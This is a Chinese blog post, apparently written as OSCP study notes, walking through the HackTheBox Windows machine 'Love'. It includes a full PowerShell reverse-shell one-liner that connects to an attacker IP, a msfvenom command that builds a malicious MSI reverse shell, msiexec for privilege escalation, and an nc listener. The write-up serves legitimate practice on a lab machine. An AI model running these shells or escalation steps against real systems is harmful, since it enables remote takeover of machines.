OSCP备考_0x57_HackThBox靶机_Windows_Love

Ethan医生5个月前靶场220

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.48.103 (扫描TCP)

image.png

绑定域名 

http://10.129.48.103/

image.png

image.png

Vote Admin Creds admin: @LoveIsInTheAir!!!! 

http://love.htb/admin/index.php

image.png

查找漏洞,上传文件

http://love.htb/admin/voters.php

image.png

image.png

然后反弹SHELL


powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.16.43',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


image.png

image.png

使用 msfvenom(Kali Linux)生成反向 Shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.43 LPORT=6666 -f msi -o evil.msi

或直接使用 msiexec 执行命令(如添加管理员用户):

msiexec /quiet /qn /i evil.msi 

rlwrap -cAr nc -lvnp 6666

image.png

标签: OSCP

相关文章

OSCP备考_0x19_Vulnhub靶机_symfonos: 2

OSCP备考_0x19_Vulnhub靶机_symfonos: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-2,331/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.1...

OSCP备考_0x39_HackThBox靶机_Windows_Optimum

OSCP备考_0x39_HackThBox靶机_Windows_Optimum

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.155 (扫描TCP)查看到版本是2.3,有rcepython3 49125.p...

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-12-3,24/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x32_HackThBox靶机_Passage

OSCP备考_0x32_HackThBox靶机_Passage

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.221.74 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x45_HackThBox靶机_Windows_ bounty

OSCP备考_0x45_HackThBox靶机_Windows_ bounty

OSCP备考_0x45_HackThBox靶机_Windows_ bountynmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.246.227&nb...

OSCP备考_0x44_HackThBox靶机_Windows_ Silo

OSCP备考_0x44_HackThBox靶机_Windows_ Silo

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.188 (扫描TCP)http都没有查看到可以利用的点这边直接是看看orcal的漏...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。